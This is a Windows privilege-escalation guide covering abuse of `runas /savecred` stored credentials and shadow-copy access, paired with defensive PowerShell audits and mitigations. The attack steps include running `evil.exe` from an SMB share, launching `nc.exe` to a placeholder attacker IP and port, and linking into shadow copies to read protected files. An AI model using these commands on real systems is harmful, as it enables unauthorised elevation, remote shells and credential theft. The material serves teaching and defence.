
# EoP - Runas

## Elevation of Privilege (EoP) Techniques: RunAs and Shadow Copies

**Overview**

Elevation of Privilege (EoP) techniques are commonly used by attackers to escalate permissions within a Windows environment. Two notable methods include exploiting the **RunAs** command for stored credentials and abusing **Shadow Copies** to access restricted files and elevate privileges.

***

## **1. EoP via RunAs Command**

The **RunAs** command allows users to execute programs with the permissions of another user. Attackers can leverage stored credentials to gain elevated access.

**Step 1: List Stored Credentials**

Stored credentials can be retrieved using the `cmdkey` utility. These credentials, if improperly managed, can be exploited to elevate privileges.

**Command to List Stored Credentials:**

```cmd
cmdkey /list
```

**Example Output:**

```plaintext
Currently stored credentials:
    Target: Domain:interactive=WORKGROUP\Administrator
    Type: Domain Password
    User: WORKGROUP\Administrator
```

**Step 2: Execute Commands with Elevated Privileges**

Once stored credentials are identified, use the `runas` command with the `/savecred` option to execute binaries or scripts with elevated privileges.

**Examples:**

* **Run a Remote Binary via SMB Share:**

  ```cmd
  runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
  ```
* **Open Command Prompt with Elevated Rights:**

  ```cmd
  runas /savecred /user:Administrator "cmd.exe /k whoami"
  ```

**Step 3: Use Provided Credentials for Execution**

Commands can be executed using specific credentials provided programmatically in PowerShell.

**PowerShell Example:**

```powershell
# Build a PSCredential object from a plaintext password (angle-bracket values are placeholders).
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
# Launch the binary under that account, passing its command-line arguments.
Start-Process "C:\users\public\nc.exe" -ArgumentList "<attacker_ip> 4444" -Credential $mycreds
```

This method is particularly useful for automating EoP through scripts.
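The steps above describe what an attacker looks for; the following PowerShell script is an added defensive counterpart, not code from the original page. It parses the output of `cmdkey /list` into objects, flags entries that are usable for interactive logon as an account whose name suggests elevated rights, prints the matching `cmdkey /delete` command for each, and checks whether credential storage is disabled by policy. The privileged-name pattern and the use of the displayed target name for deletion are assumptions you should adapt to your environment; `cmdkey` only shows the calling user's own store, so run it in the context you want to audit.

```powershell
# Added example: audit stored credentials that could back a `runas /savecred` elevation.

function ConvertFrom-CmdkeyList {
    # Parses the text output of `cmdkey /list` into Target/Type/User objects.
    param([string[]]$Lines)

    $entries = @()
    $current = $null
    foreach ($line in $Lines) {
        $trimmed = $line.Trim()
        if ($trimmed -match '^Target:\s*(.+)$') {
            if ($current) { $entries += $current }
            $current = [pscustomobject]@{ Target = $Matches[1]; Type = ''; User = '' }
        }
        elseif ($current -and $trimmed -match '^Type:\s*(.+)$') { $current.Type = $Matches[1] }
        elseif ($current -and $trimmed -match '^User:\s*(.+)$') { $current.User = $Matches[1] }
    }
    if ($current) { $entries += $current }
    return $entries
}

function Get-RiskyStoredCredential {
    # Flags entries that are (a) usable for interactive logon (the "Domain:interactive="
    # target form seen in the sample output above) and (b) for an account whose last
    # name component contains "admin". The pattern is an assumption; adjust it to your
    # naming conventions (service accounts, tiered admin accounts, etc.).
    param(
        [object[]]$Entries,
        [string]$PrivilegedPattern = '(?i)(^|\\)[^\\]*admin[^\\]*$'
    )
    $Entries | Where-Object {
        $_.Target -like 'Domain:interactive=*' -and $_.User -match $PrivilegedPattern
    }
}

# Live check against the real credential store of the current user.
$stored = ConvertFrom-CmdkeyList -Lines (cmdkey /list)
$risky  = Get-RiskyStoredCredential -Entries $stored

if ($risky) {
    Write-Warning "Stored credentials usable for elevation found:"
    $risky | Format-Table Target, Type, User -AutoSize
    # Remediation hint: cmdkey /delete requires the target name; this assumes the
    # name exactly as cmdkey displays it.
    $risky | ForEach-Object { "cmdkey /delete:$($_.Target)" }
} else {
    "No stored interactive credentials for privileged accounts."
}

# Policy check: DisableDomainCreds = 1 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa
# corresponds to "Network access: Do not allow storage of passwords and credentials
# for network authentication" and prevents credentials from being saved at all.
$lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
if ($lsa.DisableDomainCreds -eq 1) { "Credential storage is disabled by policy." }
else { Write-Warning "Credential storage is allowed (DisableDomainCreds is not 1)." }
```

The parser is deliberately tolerant of the indentation `cmdkey` uses, so the same function can be pointed at saved output collected from many hosts (for example, `ConvertFrom-CmdkeyList -Lines (Get-Content .\host1-cmdkey.txt)`) and the results aggregated centrally.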

***

## **2. EoP via Shadow Copies**

**Shadow Copies**, created by the Volume Shadow Copy Service (VSS), are point-in-time snapshots of volumes. Because a snapshot is a separate copy of the data, it can be used to read files that are locked or restricted on the live volume, giving an attacker with sufficient rights access to their contents.

**Step 1: List Shadow Copies**

To identify available Shadow Copies, use either `vssadmin` or `diskshadow`.

* **Using vssadmin:**

  ```cmd
  vssadmin list shadows
  ```
* **Using diskshadow:**

  ```cmd
  diskshadow
  DISKSHADOW> list shadows all
  ```

**Step 2: Access Shadow Copies**

Once Shadow Copies are identified, create a symbolic link (symlink) to access their contents.

**Example: Create a Symlink**

Assuming a Shadow Copy exists as **ShadowCopy1**, create a directory link:

```cmd
mklink /d C:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
```

This command creates a folder `C:\shadowcopy` that points to the Shadow Copy, allowing unrestricted access to its contents. Sensitive files, such as password databases or configuration files, can then be retrieved.
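As an added defensive example (not part of the original page), the PowerShell script below inventories the shadow copies on a host through the `Win32_ShadowCopy` WMI class and then scans a few directories for reparse points whose target names a `HarddiskVolumeShadowCopyN` device, which is exactly the artefact the `mklink /d` step above leaves behind. The search roots are an assumption; the WMI query needs an elevated prompt.

```powershell
# Added example: audit shadow copies and look for links that expose them.

function Get-ShadowCopyInventory {
    # Win32_ShadowCopy lists each snapshot with its device path
    # (\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN) and creation time.
    Get-CimInstance -ClassName Win32_ShadowCopy | ForEach-Object {
        [pscustomobject]@{
            Id           = $_.ID
            Device       = $_.DeviceObject
            Volume       = $_.VolumeName
            Created      = $_.InstallDate
            ClientAccess = $_.ClientAccessible   # $true when exposed as "Previous Versions"
        }
    }
}

function Find-ShadowCopyLink {
    # Scans the top level of each root (assumed list; extend as needed) for reparse
    # points (symbolic links and junctions) that resolve into a shadow copy device.
    param([string[]]$SearchRoots = @('C:\', $env:USERPROFILE, $env:TEMP))

    foreach ($root in $SearchRoots) {
        Get-ChildItem -Path $root -Force -Attributes ReparsePoint -ErrorAction SilentlyContinue |
            ForEach-Object {
                # PowerShell 7 exposes LinkTarget; Windows PowerShell 5.1 exposes Target.
                $target = $_.LinkTarget
                if (-not $target) { $target = $_.Target }
                if ("$target" -match 'HarddiskVolumeShadowCopy\d+') {
                    [pscustomobject]@{
                        Link    = $_.FullName
                        Target  = "$target"
                        Created = $_.CreationTime
                    }
                }
            }
    }
}

$copies = @(Get-ShadowCopyInventory)
"Shadow copies present: $($copies.Count)"
$copies | Format-Table Id, Device, Volume, Created, ClientAccess -AutoSize

$links = @(Find-ShadowCopyLink)
if ($links.Count -gt 0) {
    Write-Warning "Links into shadow copies found; check who created them and when:"
    $links | Format-Table Link, Target, Created -AutoSize
} else {
    "No links into shadow copies under the searched roots."
}
```

The link creation time is usually the most useful pivot: it can be correlated with logon events and process creation records around the same moment to establish who ran `mklink`.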

***

## **Risks and Mitigation**

**RunAs Command Exploitation**

* **Risk:** Stored credentials can be exploited if they are not adequately protected.
* **Mitigation:**
  * Avoid using `/savecred` unless absolutely necessary.
  * Regularly clear stored credentials (`cmdkey /delete:<target>`, where `<target>` is the name shown by `cmdkey /list`).
  * Implement strong password policies and enforce multi-factor authentication (MFA).

**Shadow Copy Abuse**

* **Risk:** Allows unauthorized access to sensitive files.
* **Mitigation:**
  * Restrict local administrator access.
  * Regularly audit and disable unnecessary Shadow Copies.
  * Use encryption for sensitive files and system backups.

**General Mitigation Strategies:**

* Implement principle of **least privilege**.
* Enable logging and monitoring of credential access and Shadow Copy usage.
* Apply the latest patches and security updates to minimize vulnerabilities.
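To make the "logging and monitoring of credential access" item concrete, here is an added PowerShell example (not from the original page) that pulls recent Security-log events with ID 4648, "A logon was attempted using explicit credentials", which is the event a `runas` invocation generates, and summarises them by caller, target account and process. It needs an elevated prompt or membership in Event Log Readers; the 24-hour window and the filter that drops self-to-self logons are assumptions to tune for your environment.

```powershell
# Added example: surface explicit-credential logons (Event ID 4648) for review.

function Get-ExplicitCredentialLogon {
    param([int]$Hours = 24)

    $filter = @{
        LogName   = 'Security'
        Id        = 4648
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # The named event-data fields are only reachable through the XML view.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Caller  = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
            RunAs   = "$($data.TargetDomainName)\$($data.TargetUserName)"
            Process = $data.ProcessName
            Server  = $data.TargetServerName
        }
    }
}

# Drop the routine case of an account supplying its own credentials, then list the rest.
$events = @(Get-ExplicitCredentialLogon -Hours 24 | Where-Object { $_.Caller -ne $_.RunAs })

$events | Sort-Object Time -Descending |
    Format-Table Time, Caller, RunAs, Process, Server -AutoSize

# Aggregating by target account makes repeated use of one privileged identity stand out.
$events | Group-Object RunAs | Sort-Object Count -Descending |
    Select-Object Count, Name | Format-Table -AutoSize
```

On a host where `runas /savecred` is never expected, any 4648 whose target is a local or domain administrator account from an ordinary user session is worth an alert; on busier hosts the aggregate view is the better starting point for a baseline.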

***

## **Conclusion**

The exploitation of stored credentials and Shadow Copies presents significant risks for privilege escalation. By understanding these techniques and applying the outlined mitigations, organizations can strengthen their defenses against EoP attacks.

